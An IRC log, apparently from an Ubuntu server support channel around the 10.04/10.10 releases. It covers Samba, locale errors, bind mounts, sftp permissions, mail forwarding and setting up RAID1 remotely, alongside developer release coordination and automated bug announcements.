<jkugler> Trying to do updates on a 10.04 server box.  have googled the problem, not gotten anywhere.  While extracting the archives, I am told "No space left on device."  "device" in this case being /usr.  /var has 18GB free, /usr has 464MB free, /tmp has 873MB free.  Anyone have any idea what's going on?
<jkugler> must go for now...only have one network connection at this site.
<The_Paco> yo. I'm finding Ubuntu 10.04 Server's Samba options/setup seems about twice as involved as setting up an OpenSuse box was. Is there any recommended reading/info for all the new options/setup that the smb.conf is throwing at me?
<sebikul> @The_Paco check this page, https://help.ubuntu.com/community/SettingUpSamba
<The_Paco> sebikul, thanks. I'm digging through it's links for more info on setting up a WINS server, but I'm not sure if I should bother doing that again
<The_Paco> I'm trying to serve one shared folder of files across a VPN tunnel (that doesn't support subnet bridging, unfortunately) so that all our windows xp boxes can see it. WINS seems to be unsuited for that. Is there something I should look to instead? We're a small business with no AD service or anything like that yet
<sebikul> mmm, i dont know how to do that, i only have experience with small home networks
<The_Paco> *nods* ditto
<weekly> Question: I have a machine thats spewing out kernel messages into my terminal, i can still use the terminal but these line keep appearing, how do i make them stop!?
<The_Paco> I was halfway through using OpenSuse 11.2 and having it set up, but the X11 crap kept crashing and it was just too much for the hardware I had. I was finding there that I'd need to have a server on each side serving wins and sharing wins routing tables between them. Ubuntu's Samba seems to have bigger ideas, and a lot of options I'm not seeing in the old online oreilley books, either.
<sebikul> you can try using gadmin-samba to set-up your network, you can find it in the synaptic, i am almost sure you will be able to do it using it
<pmatulis> The_Paco: one share?  that's pretty easy
<pmatulis> The_Paco: what's the problem?  there are a zillion guides out there for that
<pmatulis> The_Paco: but i would recommend the ubuntu server guide
<The_Paco> sebikul, I'll check it out, thanks; pmatulis, well, in this case I was trying to enable and allow all the windows machines to see each other using SFS, with a set of crap routers that won't bridge subnets. I had half a solution with one wins server that both routers would point to, but the other subnets systems would not transmit to or acknowledge it, regardless of their settings. Rather than have two systems using 2% of their power running wins and k
<The_Paco> eeping a decentralized and insecure windows SMB environment, I'm now checking out my options for using something a little more centralized with individual logins/shares/security levels.
<The_Paco> they could resolve share names on the other side of the router, but wouldn't share their own or 'see' the shares in network neighborhood, I mean
<uvirtbot> New bug: #650779 in php5 (main) "stream_context_create + file_get_content doesn't retrieve full file" [Undecided,New] https://launchpad.net/bugs/650779
<vbabiy_> Hey guys any idea why this would be happening: http://dpaste.com/250320/ look at lines 5, and 8
<uvirtbot> New bug: #650795 in samba (main) "Third share is always read-only" [Undecided,New] https://launchpad.net/bugs/650795
<n3kl> Hello.
<n3kl> Nice to see there is a server chanel as well.  To much man ls going on in the other.
<n3kl> I am getting strange errors with ubuntu-vm-builder on lucid.  Can someone in here helo me figure out whats going on, please?  http://pastie.org/1188100
<n3kl> Fresh install of the package
<n3kl> Networking is setup and ready to go with a br0 interface and all
<twb`> n3kl: I think it's pissed off because $LANG isn't set
<n3kl> I wondered?  should that get passed somewhere, or do I need to setup my locales?
<twb`> It should be set automagically by pam_environment or pam_<something else> in lucid
<twb`> How did you log in?
<twb`> More to the point: check if $LANG is set in that shell.
<n3kl> ssh
<n3kl> no
<n3kl> $LANG  is not set
<n3kl> so, what should it be set to, and where do I set it?
<n3kl> seems strange that I should have to change anything with pam to build a vm, no?
<twb`> en_AU.utf8, where "en" is your language code and "AU" is your country code
<twb`> Check "locale -a" for a list of valid languages
<n3kl> C and Posix.
<n3kl> so I need to modify /etc/locales and run locale-gen, eh?
<twb`> Just run this for now:
<twb`> LC_ALL=C LANG=C ubuntu-vm-builder kvm lucid
<n3kl> Looking much better
<twb`> If that works, you can deal with locales later.  If it still fails, you need to report the bug against ubuntu-vm-builder because I don't know what's going on
<twb`> OK, then just report a bug against it saying that it assumes $LANG is set
<twb`> and include that backtrace that you pastebinned
<n3kl> Cool, thank you
<Exploiter> hello everyone
<_Techie_> is there a max speed set on the repo's?
<_Techie_> as im getting about one tenth the speed ive clocked downloads running at
<twb`> Are you using your ISP or university's tertiary mirror?
<_Techie_> im using whatever mirror that the installation chooses, its a server located in a datacenter
<twb`> Well, obviously the first thing to do is confirm that it's pointing to a nearby mirror
<Exploiter> yes
<_Techie_> im using us.archive.ubuntu.com
<_Techie_> how can i determine the closest mirror to the server?
<twb`> In Debian there's a machine-readable list of mirrors that apt-spy(8) uses, and synaptic appears to have something similar built-in, but I don't know how you're supposed to do it on Ubuntu Server.
<twb`> As for me, I know /a priori/ where my nearest mirror is.
<SpamapS> twb`: where is the list for debian?
<twb`> I can't remember
<twb`> somewhere on www.d.o
<SpamapS> I tried netselect-apt once
<SpamapS> but it didn't find any mirrors
<twb`> http://www.debian.org/mirror/index.en.html
<twb`> ...except I thought it was text/plain, so maybe I misremember or it has changed
<Kaelten> just verifying here, if I use mounting options to mount a directory to another directory ont he disk, then it's affectively that the one directory is in two palces at once
<Kaelten> right?
<joschi> Kaelten: if you mean `mount --bind [...]` then the answer is yes
<Kaelten> joschi /var/www/uploads/attachments /var/www/uploads/170 bind defaults,bind 0 0
<Kaelten> in fstab
<Kaelten> assuming thats the same thing
<joschi> it is
<Kaelten> fun.....
<twb`> Usually a symlink is a better idea
<twb`> If only because it's less confusing for other sysadmins
<Kaelten> ya, I'm reversing someone elses work so I can move it to a new server
<Kaelten> if I mount bind a parent dir binding identical sub dirs would have no effect I'm assuming
<Kaelten> like if /x and /y are bound and then I did /x/a and /y/a
<Kaelten> it'd really just be a wasted mount
<joschi> yes
<Kaelten> but what would happen if I went after that and then did /y/a /y/b
<joschi> twb`: symlinks have some short comings though. not every program likes symbolic links plus a bind mount doesn't need another inode
<joschi> Kaelten: you mean `mount --bind /y/a /y/b`?
<Kaelten> yes
<Kaelten> after having already bound /x and /y and then binding /x/a and /y/a
<joschi> Kaelten: you'd have /x/a -> /x/b also since /x and /y are the same directory
<joschi> Kaelten: just think of it as /x and /y being "views" on the same on-disk data
<joschi> binding /x/a to /y/a is not possible, since when there's /x/a there's automatically /y/a
<Kaelten> persumably ubuntu just ignores the impossiblity
<Kaelten> or lets it do it anyway
<joschi> that has nothing to do with ubuntu itself but with the linux kernel (or more precisely the posix layer of the respective file systems)
<Kaelten> right
<Kaelten> I really wish this was more straightforward
<Kaelten> it was done ass backwards
<twb`> joschi: OTOH NFS doesn't like bind mounts
<twb`> And df, find -xdev and friends will not necessarily do what you expect.
<twb`> I guess I'm just saying be careful
<Kaelten> I just need rsync to work properly
<twb`> rsyncd or rsync-over-ssh?
<Kaelten> the latter
<twb`> In what way is it failing?
<Kaelten> it's not yet
<Kaelten> but I just realized that instead of writing something that'd copy the files betwen the dirs or any number of other soltuions
<Kaelten> they setup 8 interconnecting binds
<\sh> why do we still enable apache2 httpd TRACE method by default? Any Reason? This Method is only useful in testing environments, but not for production ready systems, and will always be raised by External Security Audits...
 * pennyless is away: Gone away for now
<kees> \sh: I don't think trace has been allowed for a long time. do you have some examples of it working?
<\sh> kees: looks like it was still enabled on jaunty, but lucid does has a default of TraceEnable Off...
<\sh> I was looking on a jaunty webserver ... sorry
<kees> \sh: ah, good. yeah, I was looking at /etc/apache2/conf.d/security and couldn't tell if I changed it manually or not
<\sh> well, I got the results of our Security Audit and they were complaining about that setting...but I'm still running jaunty on our production servers, which will be changed during the next three months...
 * kees goes to bed for real now.
<\sh> kees: btw...do you have any clue about rdesktop on linux in combination with rdp SSL/TLS connections towards Windows Servers?
<kees> \sh: I haven't used it myself, but let me ask a friend that uses rdesktop a lot
<\sh> kees: that would be great...thx for that :)
<kees> np, I'll email you when he answers me tomorrow :)
<\sh> kees: thx :)
<kees> \sh: oh, he's still up. says he just uses regular rdp, no ssl
<kees> \sh: he's on a vpn so he hasn't bothered digging into it when it was introduced
<\sh> kees: oh well...I need to enable ssl/tls on the windows server side, and I don't know if that works...well, I have to test it somehow then
<kees> cool. good luck! :)
 * kees really really going to bed now. g'night
<\sh> kees: have a good night :)
<kees> \sh: maybe check http://forum.nginx.org/read.php?30,101161   really^3 off now
<uvirtbot> New bug: #650936 in mysql-5.1 (main) "hread_stack must be removed to avoid problems for amd64" [Undecided,New] https://launchpad.net/bugs/650936
<koltroll> Hey guys. On my server I've set up a lamp install with ssh and ftp. Now I'm thinking, is there any reason for me to have a ftp-server when I can just use sftp?
<koltroll> Are there any downsides with skipping the vsftp-server ?
<twb> koltroll: no
<twb> Indeed, it's a move I heartily support
<koltroll> twb, another question. Is it somehow possible to set default permissions when using sftp just as you can configure the vsftp-server? In a way I think it sounds strange, but I'll ask anyway.
<twb> You mean the umask?
<koltroll> yea I guess (?) :) I want the uploaded files to be readable and writeable for the user & group.
<twb> That should be handled via pam_umask.so
<koltroll> oh ok. I'll look that up. thanks
<twb> man pam_umask
<twb> pam is not for the faint of heart
<koltroll> haha then maybe I should ignore it :)
<twb> You could use /etc/login.defs if you want it to apply to EVERYBODY
<twb> But I suspect that's probably bad juju
<koltroll> I think I rather think through how I want the permissions, and how I need it. It's just that I got everything working now, and I'm really not a server guy :)
<koltroll> Right now I got my user, web. All web pages are in /home/web. web is in the group www-data. FTP-files uploaded with web can be accessed and changed by the www-data user as well.
<koltroll> Also I got a git user /home/git that's also in the same group, and therefor can unpack repos into /home/web for projects we work on.
<koltroll> But I belive the only thing that would be changed by this, if I just ignore the pam_umask thing, is that on folders that the user www-data needs write-access to I'll set them manually.
<twb> That is, I confess, what I do for one site
<koltroll> Ah ok.
<twb> It's pretty fugly; doing it "properly" with access control would be preferable, but I don't know how
<koltroll> :)
<twb> chmod -vR go-rwx /home/*/ |
<twb> # Suppress printing of (i.e. whitelist) some expected false positives.
<twb> egrep -v 'retained as|nor referent has been changed'
<twb> ...that's what I run to prevent users from sharing data clandestinely
<koltroll> oh ok
<koltroll> Yea I'll think this through. Thanks alot!
<twb> Actually it should read go-rwx,a-st -- somehow the code has regressed :-/
<doko> cjwatson, ttx: is libgeronimo-jacc-1.1-spec-java found on a server CD?
<cjwatson> ubuntu-server/daily/current/maverick-server-amd64.list:/pool/main/g/geronimo-jacc-1.1-spec/libgeronimo-jacc-1.1-spec-java_1.0.1-1fakesync1_all.deb
<cjwatson> ubuntu-server/daily/current/maverick-server-i386.list:/pool/main/g/geronimo-jacc-1.1-spec/libgeronimo-jacc-1.1-spec-java_1.0.1-1fakesync1_all.deb
<cjwatson> (yes)
<doko> are these .list files in a convenient location to check them myself?
<doko> still need http://packages.debian.org/changelogs/pool/main/g/geronimo-jacc-1.1-spec/current/changelog :-/
<doko> ahh, ttx not here
<cjwatson> doko: http://cdimage.ubuntu.com/ubuntu-server/daily/current/
<uvirtbot> New bug: #651027 in dovecot (main) "dovecot-postfix claimed as built in debian/control but not actually built" [High,New] https://launchpad.net/bugs/651027
<BiG-M> hi, anybody knows if we can stop kthreadd or not  ??
<jpds> kthreadd?
<BiG-M> there was no process like before update, now it appears with lots of spawns
<BiG-M> its 10.04 lst headless
<BiG-M> * LTS
<uvirtbot> New bug: #651047 in rabbitmq-server (main) "initial installation presents note about upgrades" [Undecided,New] https://launchpad.net/bugs/651047
<uvirtbot> New bug: #651049 in php5 (main) "php5: FILTER_VALIDATE_URL will invalidate a hostname that includes '-'" [Undecided,New] https://launchpad.net/bugs/651049
<raubvogel> Anyone using vsftpd?
<_ruben> !anyone
<ubottu> A large amount of the first questions asked in this channel start with "Does anyone/anybody..."  Why not ask your next question (the real one) and find out?
<raubvogel> Is anon_root still available in vsftpd or there is a better way?
<kinygos> hi...probably a daft question, but is it possible to change the partitions on an already installed ubuntu 10.04 server if i don't mind losing the data in the current mount points?
<gentooxer> kinygos: yes its possible
<gentooxer> kinygos: you can even preserve the data ...
<gentooxer> kinygos: do you want to shrink, or enlarge?
<kinygos> thanks :) from what i've read, that's what i thought...but i now have my bigger problem...
<kinygos> i have a remote server with a 2nd physical hard disk that has no partitions defined or mounted...so what i was hoping to do was create partitions on that second drive, mount them, then configure RAID1 across the physical disks (for a given partition)
<ttx> Daviey: everything looking good ?
<Daviey> ttx: Yup.. we had a respin
<Daviey> (not our request, late last night)
<gentooxer> kinygos: you have to set up the 2nd device as a md device
<ttx> Daviey: I saw that this morning
<Daviey> ttx:  so the euca upgrade issue is resolved.
<kinygos> according to fdisk -l, i have a partition whose system is extended...but i don't see it mounted anywhere in fstab...is extended system special?
<ttx> I hit the print server issue, its resolved for post-RC
<kinygos> gentooxer: ooh, i didn't realise that...thanks :)
<Thelz> Hello. I've got a network here that consists of windows computers and one ubuntu server running the samba file server. Earlier today, something went wrong, and the file system must've gotten partially corrupted. Other computers were no longer able to access the ubuntu server, and the ubuntu server went in read-only mode.
<kinygos> gentooxer: i thought i had to do that after creating the partitions
<Thelz> Now I'm busy copying the files on the harddisk to an USB drive, but this seems to generate a lot of errors. I'm not sure if the files are really gone, or if it's a permission problem, and if there's some way to save the files.
<gentooxer> kinygos: no you set up a RAID1 md device with only 1 device present; copy the data from the 1st device to your new RAID device
<gentooxer> kinygos: then you have to "rebuild" the RAID, and you are ready to go
<Thelz> To top it all off, the Ubuntu Server is running on two harddisks that are in mirror mode due to a FakeRaid setup using a Sweex controller.
<kinygos> gentooxer: do i need to create corresponding partitions on the new device?
<gentooxer> kinygos: but I guess a new installation is much easier
<Daviey> ttx: Yeah... saw that.. that sounds good - those upgrading will get the fix and it's a transitional issue.. not an explosion :)
<gentooxer> kinygos: they have to be big enought to store you data, thats all
<kinygos> gentooxer: i know a new install is much easier, but i'm having a lot of problems arranging that, esp as the server is remote
<kinygos> gentooxer: thank you very much for the steer...your time is very much appreciated :)
<cjwatson> Daviey: for the record, the respin was a server team request
<cjwatson> 21:25 <mathiaz> hi - I've just upload a fix for eucalyptus to maverick
<cjwatson> 21:25 <mathiaz> and ttx fixed a problem in the seed which lead to cups not working in the installer
<cjwatson> 21:26 <mathiaz> The later will require a -server iso respin
<cjwatson> 21:26 <mathiaz> and I'd like to have the new eucalyptus included in it
<cjwatson> 21:26 <mathiaz> so - could the eucalyptus package be accepted in maverick?
<Daviey> cjwatson: Oh, sorry - i wasn't pointing fingers.  I spoke to mathiaz not long before that, and thought we agreed we weren't going to push for one.
<Daviey> but i am pleased that it did :)
<uvirtbot> New bug: #651134 in apache2 (main) "apache crashes with *** glibc detected *** /usr/sbin/apache2: double free or corruption (fasttop): 0x00007f8b5c8fdac0 ***" [Undecided,New] https://launchpad.net/bugs/651134
 * zul pauses
<ScottK> \sh: Are you coming to UDS again?
 * zul returns
<Thelz> Does anyone know? If I configured a Sweex controller to set 2 SATA disks in RAID1 mode, and then install ubuntu server, is the data only on the first drive, or on both drives? (Since Ubuntu Server still seems to detect both drives)
<slestak> i am trying to forward root's mail on my 10.04 lts server install to my gmail account.  I havent setup an MX record or anything because I do not want to provide mail services, just forwarding
<ruben23> hi guys i get to start my linux server when i startup i get grup loading 1.5, grub loading please wait.....error 15 ----> any idea please..?
<slestak> i have an /etc/aliases entry for root : steve and an /etc/email.addresses entry for steve : myeml@gmail.com
<cemc> slestak: you could just have root: myeml@gmail.com in /etc/aliases if I'm not mistaken
<slestak> i thought this would be sufficient.  using mailx to send a mail to my work exchange server works fine
<slestak> cemc: i tried that first but was getting rejections from gmails smtp
<slestak> using mailx to send to local user root fails
<cemc> slestak: rejections?
<slestak> i have an example
<slestak> sec
<slestak> http://paste.pocoo.org/show/269001/
<slestak> this looks like I am trying to offer up slestak.homelinux.org as a mail service, which is overkill for my needs
<slestak> i could prob remove exim and just use bsmtp or sth liek that
<cemc> slestak: I don't get it... do you want to send root emails to google? why is google trying to send email back to you?
<slestak> i want my root mails to be sent to my gmail address.
<ruben23> how do i boot my server to get on a recovery mode whern i have commandline login as root..?
<slestak> that is all i am trying to accomplish
<slestak> so I am beginning to thing that exim or postfix are overkill
<slestak> ruben23: there is a recovery mode avaiable in yor grub menu, iirc
<slestak> i think you can do a sudo -i to get a root prompt in that shell
<slestak> what do you guys do with root mail on non-mail servers?
<\sh> ScottK: nope...this time I don't have the time, nor I get a sponsoring of my company
<ruben23> slestak: is this upon reboot po to..?
<cemc> slestak: I think you still need some basic postfix, even if it's not open to the internet
<\sh> ScottK: hopefully next year again somewhere in europe
<slestak> i think i have used bsmtp in teh past for that.  since it is a multiverse app i wanted to see what the common best practicve is
<\sh> now lets have a look at the rcbug list
<zul> ttx: why are we still testing esx?
<ttx> zul: I think it's done in the certification labs
<zul> ttx: okies
<cemc> slestak: do you have static IP address with a good reverse on that host?
<slestak> looks like esmtp is in apt, but is end-of-lifed per its own webpage.  msmtp looks liek a winner
<slestak> cemc: no, i have dynamic dns.  its a home server
<cemc> slestak: that could be a problem then, when sending mail to the internet, it might get rejected
<ScottK> slestak: The odds of you being able to deliver mail to gmail from a dynamic IP are very low.
<cemc> slestak: you should use a smarthost for sending mail, you shouldn't send directly
<slestak> would you recommend postfix?
<slestak> or exim?
<cemc> slestak: me personally, definitely postfix
<alok_rocks_> hello everybody
<alok_rocks_>  have a problem with phpmyadmin, i have installed it but not working    http://localhost/phpmyadmin>Not  Found  The requested URL /phpmyadmin was not found on this server. Apache/2.2.14 (Ubuntu) Server at localhost Port 80
<ttx> JamesPage: just assigned you to bug 651155
<uvirtbot> Launchpad bug 651155 in easymock "easymock fails to build from source in maverick" [High,Confirmed] https://launchpad.net/bugs/651155
<ttx> I won't have time to look into it, so it's better if you can have a look
<ScottK> ttx: We'll need someone to be in charge of server boot experience.  It seems very popular on ubuntu-devel.  I could run a UDS session on what people would like to see, but it would be more useful to get someone who might actually be able to do the work involved from the start.  I added it to the wiki page.
<slestak> it looks liek ssmtp is providing what i need
<uvirtbot> New bug: #651182 in mailman (main) "Invocations of "/etc/init.d/mailman start" spawns multiple instances" [Undecided,New] https://launchpad.net/bugs/651182
<JamesPage> ttx: no problem - looking at it now - feel free to keep throwing this sort of stuff at me !!
<blackxored> I know this is the simplest of questions, but still can't remember now, what's the rewrite rule I can use for when I go to http://myhost It actually goes to http://myhost/dir ???
<blackxored> apache, TW
<ttx> ScottK: did you get my answer ? I'm having connection issues
<ScottK> ttx: I did not.
<ttx> <ttx> ScottK: yes, that's what I had in mind under the "upstart/plymouth for servers" heading
<ttx> <ttx> ScottK: I long advocated for a server "low level" position (aka server foundations) or for a Foundations "server" position to bridge the gap
<ttx> <ttx> ScottK: not completely sure which track that would land to, though :)
<ScottK> ttx: OK.  Thanks.  I'm not sure either, that's why I didn't reply to one of the track specific emails.
<ScottK> (BTW, I think this is a bug in the new track definitions).
<blackxored> neverming I spot it
<ttx> JamesPage: do you have an opinion on JOnAS
<ttx> ?
<zul> ttx: i do its a good weezer song :)
<JamesPage> ttx: just talking ISO testing with mathiaz
<kinygos> hi...i wonder if someone could spare me a few moments...i have a ubuntu 10.04LTS server with 2 disks, only 1 is partitioned, and i'd like to implement RAID1 across both drives...following some earlier advice, i've come up with a series of commands to create the raid on the second disk, copy the first disk to it, then add the first disk logically to the raid.  the commands are listed here http://dpaste.com/250536
<kinygos> my question is, when i reboot, how can i tell the server to use the raid on the second disk?
<RoyK> in bios
<RoyK> if the server is fairly reinstalled, reinstalling directly on software raid1 will probably be of less hassle
<RoyK> kinygos: also, remember to install grub on that drive
<kinygos> bugger...it's a remote server, and i don't have budget to get external media mounted on it :(
<kinygos> RoyK: thanks for that...i knew i'd miss something
<RoyK> you might be able to configure grub to boot from the new disk, but I would recommend doing that onsite
<RoyK> the chances of something going bad are always high when fiddling with these things from remote
<kinygos> RoyK: i do have a lights-out board in there, so i can reinstate the ISP base image for the server wuite easily
<kinygos> RoyK: i don't have any data on it yet...just preparing the box for my application
<RoyK> with the lights-out board, don't you get remote console with bios for it?
<kinygos> RoyK: ooh..i didn't check that...lol (feeling foolish)
<RoyK> I would guess it should be quite easy to make someone insert an ubuntu cd on it without too much cost?
<RoyK> my ISP does that for free :P
<kinygos> RoyK: unfortunately not...the ISP has 9.04 as base image, and i'm on a very tight budget...it will cost Â£60 per half hour engineer time to give me some disk space for an .iso image somewhere :(
<kinygos> (and yep, i value my time more, but my sponsor doesn't see it that way)
<ttx> smoser: how is image testing going ?
<SpamapS> kinygos: where is the ISP base image mounted?
<RoyK> kinygos: iirc 9.04 can be installed on raid1
<SpamapS> yeah
<SpamapS> kinygos: install 9.04 on RAID1, then upgrade to 9.10, then 10.04
<ttx> Daviey, mathiaz: will shut down in 15 minutes, let me know if you have any question
<SpamapS> kinygos: and tell your ISP to update to 10.04!
<ttx> Daviey, mathiaz: looks like we are good to go for RC
<mathiaz> ttx: great
<mathiaz> ttx: Daviey: catchup on mumble?
<RoyK> SpamapS: if they charge GBP 60 for half an hour fiddling, they will probably charge GBP 1k for burning out a new 10.04 CD
<ttx> mathiaz: I can try -- though I don't have my headset
<SpamapS> true
<SpamapS> kinygos: how much are you paying per month? Maybe you should look into an IaaS provider. ;)
<RoyK> kinygos: can you install 9.04 from scratch without paying them much?
<kinygos> Â£79 per month...but i've paid for a year :(
<smoser> ttx, i've run the tests, i have to go through and look at results. there was one set of failures that i think must have been test case failures.
<SpamapS> kinygos: WOW
<smoser> i'll start posting results soon.
<kinygos> unfortunately it's an image blat...not an installation process that i can get involved in
<SpamapS> kinygos: I hope thats a really powerful machine.
<kinygos> i'm starting to feel nervous
<RoyK> kinygos: man, that's a lot, is this a VM or a PM?
<SpamapS> kinygos: Ok, you *can* build a broken RAID1, copy the system to it, and then boot from that, and add the other disk to it....
<kinygos> dedicated server
<RoyK> k
<Daviey> mathiaz: sure, give me a few mins tho
<Daviey> ttx: no questions here.
<kinygos> i need a dedicated server as i'm gonna put postgresql and django on it
<SpamapS> kinygos: a lot can go wrong, and the grub bit may get.. scary. ;)
<RoyK> kinygos: ic, but with the lights-out board, you can probably do a lot from remote
<SpamapS> kinygos: FYI, the cloud providers out there, like EC2 and Rackspace, will run a db service for you so you don't need such a powerful machine.
<kinygos> SpamapS: i know :(  i've just started looking at how to install grub on the second disk and i'm flapping a bit
<SpamapS> kinygos: its not that bad. we'll hold your hand.
<SpamapS> kinygos: and as long as you have that lights out board, you can fix whatever breaks. :)
<kinygos> :) thanks i really do appreciate your time...i'll go figure out the grub piece and report back
 * RoyK wonder wth an ISP will be using 9.04 as the standard where LTS releases are so much better supported
<SpamapS> yeah
<SpamapS> they sound completely nutty
<SpamapS> in fact, isn't 9.04 dead next month?
<kinygos> it gets worse...they're planning on dropping ubuntu and continuing with CentOS!!!!
<RoyK> SpamapS: not for servers - three years support for servers
<RoyK> kinygos: heh - idiots
<ScottK> RoyK: No.
<ScottK> SpamapS: Yes.
<SpamapS> RoyK: you sure? I don't think thats true.
<RoyK> so far the only reason we have 9.04 on some boxes is that 10.04 doesn't ship with g77 :Ã¾
<ScottK> RoyK: Server support is 5 years on LTS, 18 months on everything else.
<kinygos> upgrading from 9.04 to 9.10 then 10.04 was a breeze (thanks to the ubuntu community)
<SpamapS> ScottK: FYI, mtaylor and I decided it may be better to not have drizzle in maverick, and just publicize the PPA.
<ScottK> SpamapS: Then please file a bug asking for package removal.
<SpamapS> ScottK: when the decision is final, will definitely do so.
<JamesPage> ttx: don't have an opinion of JOnAS yet - I'll take a look and compare with JBoss
<ttx> JamesPage: cool
<RoyK> ScottK: you're right
<RoyK> ScottK: I was mixing up desktop and server support....
<RoyK> desktop support for LTS is 3yr
<ScottK> Yep.
 * ScottK notes Dapper on servers has 9 months to live.
<RoyK> kinygos: remember to configure update manager not to upgrade to 10.10 when that arrives (vi /etc/update-manager/release-upgrades ...)
<RoyK> well, unless you want inter-lts-releases
<ScottK> That's actually default for LTS releases.
<RoyK> ScottK: not if upgrading from non-LTS-releases
<RoyK> upgrading from 9.10 to 10.04 won't change that
<RoyK> I just upgraded a set of servers from 9.04 to 10.04 and had to change that thing myself
<afeijo> I created a .bashrc at my home folder, but its not working when I log in.  What else need to be done?
<RoyK> afeijo: normally there is a .bashrc in all user folders (copied from /etc/skel with useradd -m)
<RoyK> and the work well
<RoyK> afeijo: pastebin the .bashrc file, please
<afeijo> RoyK: it has just 2 lines with alias cmd
<afeijo> my folder had no .bashrc, pretty weird
<afeijo> I will copy from skel and try again
<RoyK> afeijo: cp -a /etc/skel/. $HOME
<RoyK> or -R even
<RoyK> doesn't matter - just make sure your user owns the file
<RoyK> s/file/files/
<afeijo> it didnt work :( something is missing in this server
<afeijo> it is not reading my .bashrc
<afeijo> and why when I run sh .bashrc it dont execute my aliases ?
<hggdh> because when you run 'sh .bashrc' you are running on a new shell. You should instead source it: '. .bashrc'
<afeijo> hggdh: thanks :)
<afeijo> that help, but it would be better if it ran automatically at login :(
<hggdh> .bashrc should executed on every new shell you open. Close your current (or logoff) and open it again, it should be there
<afeijo> I did that
<hggdh> afeijo: what is your login shell (look at your /etc/passwd entry)
<afeijo> /home/lg:/bin/bash ?
<hggdh> OK, yes
<kinygos> RoyK: i was afk...just got your message about configuring update manager...thank you for that
<hggdh> afeijo: on *login* ~/.profile will be executed. In there (default .profile) you should have a . .bashrc
<hggdh> afeijo: so... is it there?
<afeijo> bingo!
<afeijo> hggdh: someone changed that file, it had a typo :)
<afeijo> fixed, thanks!!!!!
<afeijo> I fixed in the /etc/skel too
<hggdh> afeijo: cool
<afeijo> hggdh: last question if I may. Where would I add new glogal aliases (i.e. alias l="ls -lah --color=auto") so my users wont have to do it at their .bashrc ?
<hggdh> afeijo: probably on /etc/profile.d -- create a new file there, based on the existing ones
<ScottK> Good server upgrade test on i386.
<zul> JamesPage: ping
<JamesPage> zul: pong
<zul> JamesPage: why did the automated testing miss the samba amd64 one last night?
<JamesPage> It didn't - the test has a bug which causes it to fail as nmbd does not start quickly enough.
<JamesPage> I think the only test which is an issue is the print-server one which ttx is aware or.
<zul> JamesPage: ah ok
<JamesPage> Postgresql has a similar issue with the actual test script itself.
<kinygos> i'm planning on installing RAID1 on a second physical disk, copying my first disk contents to the second disk, rebooting then adding the first disk to the RAID...i'm wondering if the following is valid for installing grub on the RAID that i've created  # grub-install /dev/md1 (i'm sure it can't be this simple)
<kinygos> or should i be installing grub on the underlying disk (grub-install /dev/sdb) ?
 * RoyK doesn't remember
<RoyK> google for it
<kinygos> ok, i will try it...i've read somewhat conflicting instructions...which makes it somewhat baffling
<kinygos> lol...dd takes for ever
<kinygos> that wasn't a criticism btw...just an observation that i should've kept to myself in hindsight
<RoyK> kinygos: dd?
<RoyK> kinygos: you can easily copy a filesystem with rsync
<RoyK> without copying the empty bits
<kinygos> d'oh!
<kinygos> <-- will never make a sysadmin
<kinygos> i guess you learn from experience
<RoyK> hehe
<SpamapS> kinygos: The only way any of us has learned, is by admitting that we know nothing. ;)
<SpamapS> which is why we stop learning and turn into kurmudgeons ;)
<kinygos> :)
<SpamapS> kinygos: to answer your earlier question, yes install it on the underlying disk.
<SpamapS> kinygos: are you still dd'ing ?
<kinygos> i am indeed
<SpamapS> kinygos: its probably *safer* to use rsync/cp than dd
<SpamapS> kinygos: otherwise the volume sizes might be slightly different
<kinygos> SpamapS: should i cancel and start again with rsync?
<SpamapS> kinygos: I would
<SpamapS> kinygos: you'll need to mess with a few things like UUID, but that shouldn't be so terrible. ;)
<kinygos> SpamapS: i was thinking of destroying the RAID i'd created...go back to an unmounted, unpartitioned disk
<SpamapS> kinygos: no, the RAID is fine
<SpamapS> kinygos: I mean, it should be
<SpamapS> kinygos: as long as you marked the partitions as type FD (raid autodetect)
<SpamapS> hrm this is getting beyond my recent experience.. int he past I'd have chrooted into the new root filesystem and ran 'mkinitrd' ...
<kinygos> all i did was create the RAID on the disk, update the raid config on the original disk, and then ran update-initramds -u
<kinygos> i never even knew mkinitrd existed
<SpamapS> on the disk?
<SpamapS> so no partitions?
<SpamapS> kinygos: update-initramds is better. ;)
<SpamapS> kinygos: when you say you that you "created the raid on the disk".. did you create partitions, or just do the whole disk, like , /dev/sdb ?
<kinygos> SpamapS: apologies for the delay, was afk...i used the following: mdadm --create /dev/md1 --level=1 --raid-devices=2 missing /dev/sdb
<SpamapS> kinygos: bad idea
<SpamapS> kinygos: create a partition
<SpamapS> kinygos: otherwise your raid array may not be properly autodetected
<elb0w> Does ubuntu have a built in firewall that would block me from connecting to a remote db on 3306?
<kinygos> SpamapS: my first disk has 5 partitions (iirc)...should i match them, or just create any parition?
<SpamapS> kinygos: the simplest thing is yes, to duplicate the partition table.
<SpamapS> elb0w: it shouldn't be blocking anything outgoing by default
<JamesPage> mathiaz or ttx: I just pushed a branch for bug 651155; please could you review (server-mrs)
<uvirtbot> Launchpad bug 651155 in easymock "easymock fails to build from source in maverick" [High,In progress] https://launchpad.net/bugs/651155
<JasonMSP> Ii've got squirrelmail working on my server.  Now I am trying to setup the virtualhosts to point each mail.mywebsite.com to the squirrelmail folder so that rather then the user typing www.mywebsite.com/squirrelmail they can just type mail.mywebsite.com  virtualhost file.  Going to the mail subdomain gets me a blank page.
<DualProxy> Anyone know how to list members of groups that are admins (`gpasswd -A`)???
<JasonMSP> you can cat /etc/group and read the names next to the group name.
<DualProxy> yeah, I tried that but it does not specify if they are admin or just members.
<JasonMSP> grep ^admin /etc/group  will also work
<DualProxy> I'm not talking about the group "admin", I mean the group "status" of a member. If you use `gpasswd -A usr grp` that user becomes an admin of the group, and can add/remove members from only that group.
<RoyK> ffs - the internet connection regularly drops around 8-9pm
<bobslaede> Hi, which package is 'killall' in? apparently its not installed by default in my VM guest
<RoyK> roy@lamia:~$ dpkg -S `which killall`
<RoyK> psmisc: /usr/bin/killall
<uvirtbot> New bug: #649264 in minicom (universe) "minicom crashed with SIGSEGV in __libc_start_main()" [Low,Incomplete] https://launchpad.net/bugs/649264
<bobslaede> RoyK: yeah, its not installed on my guest os
<bobslaede> ubuntu
<ScottK> bobslaede: http://packages.ubuntu.com/search?searchon=contents&keywords=killall&mode=exactfilename&suite=lucid&arch=any
<ScottK> (you'll want the second one on the list)
<bobslaede> ah, i get it. thanks ScottK and RoyK :)
<ScottK> You're welcome.
